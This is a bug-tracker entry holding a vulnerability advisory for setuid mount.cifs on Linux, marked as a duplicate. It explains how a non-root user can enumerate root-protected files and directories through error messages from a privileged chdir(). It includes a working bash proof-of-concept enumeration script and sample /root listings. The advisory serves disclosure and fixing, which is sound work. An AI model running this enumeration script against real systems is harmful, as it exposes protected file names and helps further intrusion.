Created attachment 7363 [details] advisory For example, /root/secretfile can be identified, becouse any user can control the privileged chdir() and infer the response. The chdir() maybe should be launched afther the fstab check, and only over fstab dierctories. ########## Blueliv Advisory 2011-002 ########## - Discovered by: Jesus Olmos Gonzalez - Risk: 5/5 - Impact: 1/5 ############################################### 1. VULNERABILITY ------------------------- linux arbitrary privileged arbitrary chdir(), this leads to an arbitarry file identification as root. 2. BACKGROUND ------------------------- mount.cifs (GNU Software) is part of linux base system, and is setuided on most of the distributions. This software mounts cifs partition to authorized directories by fstab. 3. DESCRIPTION ------------------------- Althow there is not authorized cifs mounts, is possible by the second parameter to control a privileged chdir() syscall and infer the return value throught the responses. This implies, a little security breach on linux permissions. A non root user can enumerate files and directories as root. This can help to exploit another vulnerabilities, enumerate /root/ contents, descriptors used by any process, user homes, etc ... one of the attack vectors is /root/ directory scan: [sha0@spinlock advs]$ ./root_eye.sh wordlist /root/ --- directories --- .pulse1 .bash_history .alsaplayer .dbus .mozilla .VirtualBox .vim .links .config .cpan .gnome2 --- files --- .pulse-cookie .keystore .bash_profile dead.letter .mysql_history .Xauthority .vimrc .viminfo secret Also let to enumerate sub-sub directories in order to dump readable files. 4. PROOF OF CONCEPT ------------------------- #!/bin/bash # root enumerator 0day by jesus.olmos@blueliv.com # discover root protected files & directories, user homes, process descriptors, ... path=$2 wordlist=$1 for i in `cat $wordlist` do echo -n "$i:" /sbin/mount.cifs //127.0.0.1/a $path/$i done 2>log.$$ 1>&2 echo --- directories --- for i in `grep 'denied' log.$$ | cut -d ':' -f 1` do echo $i done echo --- files --- for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1` do echo $i done rm log.$$ 5. BUSINESS IMPACT ------------------------- The confidenciality can be breached, This method of transfer files, is highly dangerous and can rely on a remote control of the server 6. SYSTEMS AFFECTED ------------------------- all versions are affected 7. SOLUTION ------------------------- The chdir() should be done after the fstab check. 8. REFERENCES ------------------------- http://gnu.org 9. CREDITS ------------------------- Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com Blueliv SL 10. DISCOLSURE TIMELINE ------------------------- February 20, 2012: Vulnerability discovered March 07, 2012: Reported to the vendor 11. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.
*** This bug has been marked as a duplicate of bug 8821 ***